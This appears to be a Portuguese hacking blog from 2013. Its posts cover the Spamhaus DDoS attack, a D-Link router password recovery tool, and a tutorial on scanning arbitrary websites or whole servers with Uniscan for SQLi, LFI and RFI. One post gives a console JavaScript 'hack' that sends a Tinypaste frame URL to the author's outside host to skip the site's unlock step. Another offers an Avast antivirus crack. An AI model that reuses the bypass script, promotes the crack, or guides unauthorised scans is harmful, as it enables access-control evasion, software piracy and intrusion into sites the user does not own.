Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

quinta-feira, 28 de março de 2013

Entenda o ataque que quase derrubou a internet nesta semana


O ataque que quase paralisou a internet revelou uma nova tática dos criminosos. Em vez de atacar diretamente o alvo, eles miraram a infraestrutura da rede.

São Paulo — O maior ataque cibernético da história da internet parece ter dado uma trégua na tarde de quarta-feira, depois de deixar a rede lenta em muitos países. Mas especialistas alertam que agressões ainda mais intensas podem acontecer e paralisar partes da internet no mundo.

Esse ataque marcou a inauguração de uma nova tática. Em vez de mirar diretamente seu alvo, os criminosos alvejaram a infraestrutura da rede, o que aumentou muito a intensidade da agressão. O episódio fez acender o sinal amarelo para muitas empresas que operam serviços de datacenter e de telecomunicações. A dificuldade em combater esse tipo de agressão e identificar os responsáveis mostra que não é fácil evitar esse tipo de problema.

O ataque começou tendo como alvo uma empresa europeia de combate ao spam, a Spamhaus. Mas acabou se multiplicando e afetando até serviços populares, como a Netflix. Na Europa, ele causou lentidão no acesso à rede para milhões de usuários.

Não se sabe, com certeza, quem está por trás desses ataques. A Spamhaus mantém listas atualizadas de servidores que enviam spam. Essas listas são vendidas a produtores de software de segurança e a provedores da internet. São usadas pelos programas antispam para filtrar os e-mails. A empresa, é claro, é odiado pelos spammers. 

Nas últimas semanas, houve uma briga entre a Spamhaus e a companhia de serviços de datacenter holandesa CyberBunk, que acusa a Spamhaus de tê-la incluído indevidamente na lista de spammers. A Spamhaus, por sua vez, diz que a CyberBunk está por trás dos ataques, mas não há provas disso.

"Maior ciberataque da História" deixa internet lenta em todo o mundo




Briga entre grupo que luta contra o avanço do spam e empresa que abriga sites causou ataques que atingiram a estrutura central da rede

A internet ficou mais lenta ao redor do mundo nesta quarta-feira devido ao que especialistas em segurança chamaram de maior ciberataque da História. Uma briga entre um grupo que luta contra o avanço do spam e uma empresa que abriga sites deflagrou ataques cibernéticos que atingiram a estrutura central da rede.

O episódio teve impacto em serviços como o Netflix - e especialistas temem que possa causar problemas em bancos e serviços de e-mail. Cinco polícias nacionais de combate a crimes cibernéticos estão investigando os ataques.


O grupo Spamhaus, que tem bases em Londres e Genebra, é uma organização sem fins lucrativos que tenta ajudar provedores de email a filtrar spams e outros conteúdos indesejados. Para conseguir seu objetivo, o grupo mantém uma lista de endereços que devem ser bloqueados - uma base de dados de servidores conhecidos por serem usados para fins escusos na internet.

Recentemente, o Spamhaus bloqueou servidores mantidos pelo Cyberbunker, uma empresa holandesa que abriga sites de qualquer natureza, com qualquer conteúdo - à exceção de pornografia ou material relacionado a terrorismo.

Sven Olaf Kamphuis, que diz ser um porta-voz da Cyberbynker, disse em mensagem que o Spamhaus estava abusando de seu poder, e não deveria ser autorizado a decidir "o que acontece e o que nao acontece na internet".

O Spamhaus acusa a Cyberbunker de estar por trás dos ataques, em cooperação com "gangues criminosas" do Leste da Europa e da Rússia. A Cyberbunker não respondeu à BBC quando contactada de forma direta.

"Trabalho imenso"

Steve Linford, executivo-chefe do Spamhaus, disse à BBC que a escala do ataque não tem precedentes. "Estamos sofrendo este ciberataque por ao menos uma semana". "Mas estamos funcionando, não conseguiram nos derrubar. Nosso engenheiros estão fazendo um trabalho imenso em manter-nos de pe. Este tipo de ataque derruba praticamente qualquer coisa".

Linford disse à BBC que o ataque estava sendo investigado por cinco polícias cibernéticas no mundo, mas afirmou que não poderia dar mais detalhes, já que as polícias envolvidas temem se alvos de ataques também.

Os autores da ofensiva usaram uma tática conhecida como Ataque Distruibuído de Negação de Serviço (DDoS, na sigla em inglês), que inunda o alvo com enormes quantidades de tráfego, em uma tentativa de deixá-lo inacessível. Os servidores do Spamhaus foram escolhidos como alvo.

Linford disse ainda que o poder do ataque é grande o suficiente para derrubar uma estrutura de internet governamental.

Fonte : noticias.terra.com.br

quarta-feira, 27 de março de 2013

[DLink Password Decryptor] Ferramenta para recuperar a senha de login da D-Link modem/router




DLink Password Decryptor é uma ferramenta de desktop livre para recuperar instantaneamente a senha de login da D-Link modem / roteador.

Se você perdeu a senha de login de autenticação do seu modem D-link e você tem arquivo de configuração de backup , então você pode usar essa ferramenta para rapidamente voltar a sua senha.

Ele suporta modo dual de recuperação de senha. Você pode digitar a senha D-link criptografado diretamente ou especificar o arquivo Modem D-Link configuração de backup. No segundo caso, ele irá detectar automaticamente a senha de login do arquivo de configuração e decifrá-lo instantaneamente.


Note-se que é testado com número limitado de modems D-Link incluindo o mais recente modelo DSL-2750U. Por isso, pode ou não pode trabalhar com outros modelos.

Esta é uma ferramenta muito útil para todos os administradores de rede , bem como testadores de penetração.
É testado com sucesso em ambos 32 bits e sistemas de 64 bits do Windows a partir do Windows XP para o Windows 8.

IMAGENS

DLink Password Decryptor está mostrando a senha recuperado da Login Senha criptografada D-Link
DLink Password Decryptor está mostrando a senha recuperado da Login Senha criptografada D-Link



Mostrando senha recuperado do arquivo de configuração da D-Link de backup.

Licença: freeware 
Plataforma: Windows XP, 2003, Vista, Windows 7, Windows 8 

quarta-feira, 20 de março de 2013

Visualizando códigos do Tinypaste sem senha!

Salve galera, como vão? Hoje vou ensinar uma dica fresquinha para visualizar códigos no Tinypaste (www.tny.cz) sem precisar desbloquear a tela como é pedido em alguns casos, para tal façanha, utilizaremos um hack criado por mim:



if (document.getElementById("pasteFrame").src != null) {
hack = confirm("Injetar Hack?");
if (hack){
var homepg = window.location;
var linkcod = window.btoa(document.getElementById("pasteFrame").src);
window.location ="http://www.hchost.hol.es/hack_tny.php?url=" + linkcod + "&home=" + homepg;
alert("Hack injetado! WWW.HCHOST.BLOGSPOT.COM");
} else {
alert ("Você não injetou o hack. D:");
}
} else {}




Para que ele funcione você deverá abrir a página do tny.cz e após isso o console Java do seu navegador, como assim Guilherme? Bom para fazer isso basta pressionar Alt + Ctrl + K se você utiliza Firefox, e Ctrl + Alt + J para o Google Chrome.

Depois de aberto, basta copiar o código acima e colar no console e teclar enter, A PÁGINA COM O CÓDIGO QUE VOCÊ DESEJA VER DEVE ESTAR ABERTA NO MOMENTO DE EXECUTAR ESTE CÓDIGO. Só assim funcionará! Caso funcione, ele perguntará se deseja realmente injetar o hack, basta clicar em OK. Você será direcionado até a página na qual você poderá visualizar e copiar o código. Bom proveito!

terça-feira, 19 de março de 2013

Avast Internet Security 8 + crack até 2050!



Eae pessoal tudo bom? Primeiramente venho pedir desculpas por passar tanto tempo sem postar algo, a verdade é que estou sem tempo para tal atividade, os estudos me consomem! (kkkk)
Hoje lhes apresento o Avast 8, um poderoso anti-vírus atualizadíssimo e o crack que o valida até 2050! Bacana né? Sem mais delongas, para fazer download do avast, CLIQUE AQUI. Para baixar o Crack, CLIQUE AQUI.

Assista o vídeo abaixo para entender como validar seu Avast:


Até mais, e boa segurança!

quarta-feira, 6 de março de 2013

Encontrando vulnerabilidade em aplicações web usando o BackTrack - UniScan


Olá pessoal, estaremos mostrando como fazer uma varredura em busca de vulnerabilidades em um site, ou todos os sites no servidor. Neste tutorial vou usar um programa no BackTrack chamado Uniscan. é muito fácil de usar, mas muito bom em scanner. Primeiro de tudo, abra seu terminal e digite o comando:

root@bt:~# cd /pentest/web/uniscan/
root@bt:/pentest/web/uniscan# ./uniscan.pl




Algo como isso vai ser mostrado no terminal. Agora tudo o que temos a fazer é seguir as instruções. Primeiro de tudo, precisamos de um alvo para scannear, eu escolhi um e já vou usá-lo. Para iniciar a verificação, primeiro você tem que verificar as opções que você deseja usar no seu exame. 

 Como usar as opções: 

Confira a letra ao lado de sua opção, e incluí-lo após a URL como esta: 

./uniscan.pl -u http://www.website.com/ -b -q -d -w

ou pode colocá-los todos juntos. 

./Uniscan.pl -u http://www.website.com/ -bqdw 


Isto irá iniciar a varredura com todas as opções disponibilizadas pelo uniscan. 
NOTA: - Nunca se esqueça da barra NO FINAL DO LINK ( http://www.website.com/ <==)

Agora, a varredura começará, e o terminal será algo parecido com isto: 




Esta varredura irá procurar vulnerabilidades como LFI / SQL-i / RFI e assim por diante. Ele também procura por Webshells, backdoors, divulgação Informações PHP, e-mails, e muito mais.

Aqui estão alguns exemplos:

PHP.info () divulgação:




Links Externos / hosts:


Divulgação Código Fonte:


Dinâmica de varredura, Identificação de vulnerabilidade: 



Este programa também pode obter todos os sites em um servidor, e então você vai ser capaz de digitalizar todos eles.

Para isso, execute o comando:

./Uniscan.pl -i "ip: 127.0.0.1"


Mude 127.0.0.1 para o servidor de destino. Todos os sites serão armazenados em "sites.txt" no mesmo diretório.

Agora, para verificar os sites na lista, execute este comando:

./uniscan.pl -f sites.txt -bqwd


Caso queira alterar algo no UniScan segue o link para download 


Até a próxima.



Projeto Uniscan - Scanner de Vulnerabilidade(WEB)

O Uniscan é um scanner de vulnerabilidade para aplicações Web, escrito em Perl para o ambiente Linux. Ele foi desenvolvido como trabalho de conclusão do curso de ciência da computação da Universidade Federal do Pampa e está licenciado sob a GNU General Public License 3.0 (GPL 3) .

Atualmente, a versão de Uniscan é de 6,2. Abaixo estão listadas as características de Uniscan.




Uniscan características:


  • Identificação de páginas do sistema através de um Web Crawler.
  • Uso de threads no rastreador.
  • Controlar o número máximo de solicitações do rastreador.
  • Controle da variação de páginas de sistema identificados por Web Crawler.
  • Controle de extensões de arquivos que são ignorados.
  • Teste de páginas encontradas através do método GET.
  • Teste as formas encontradas através do método POST.
  • Suporte para solicitações SSL (HTTPS).
  • Suporte a proxy.
  • Gerar lista de sites usando o Google.
  • Gerar lista de sites usando Bing.
  • Plug-in suporte para rastreador.
  • Plug-in suporte para testes dinâmicos.
  • Plug-in suporte para testes estáticos.
  • Plug-in suporte para testes de stress.
  • Suporte multi-língua.
  • Cliente web.
  • Cliente GUI escrito em perl usando tk.


domingo, 3 de março de 2013

Reduza o consumo de memória do firefox com o Memory Fox

Um dos sérios problemas do firefox é seu consumo imponderado de memória. Muitas vezes o meu chegava a consumir mais memória do que games  como Cryses 2 e CoF Black Ops. Mesmo aquelas dicas para mudar a configuração do navegador pelo about:config muitas vezes não são suficientes. Pode falar que o probela é em máquinas fracas, mas não é verdade, ele parece entrar em um loop crescente de memória. Incrível como ele consegue. Porém para resolver o problema basta instalar o Memory Fox.

"Ao instalar o Memory Fox no seu Firefox, esse consumo é drasticamente diminuído em primeiro momento, e fica estabilizado depois de um tempo, como é possível notar nas imagens acima. Em computadores mais potentes, mesmo essa alteração tão grande pode não ser perceptível, mas dependendo dos outros aplicativos que estiverem abertos, isso pode sim ser muito importante."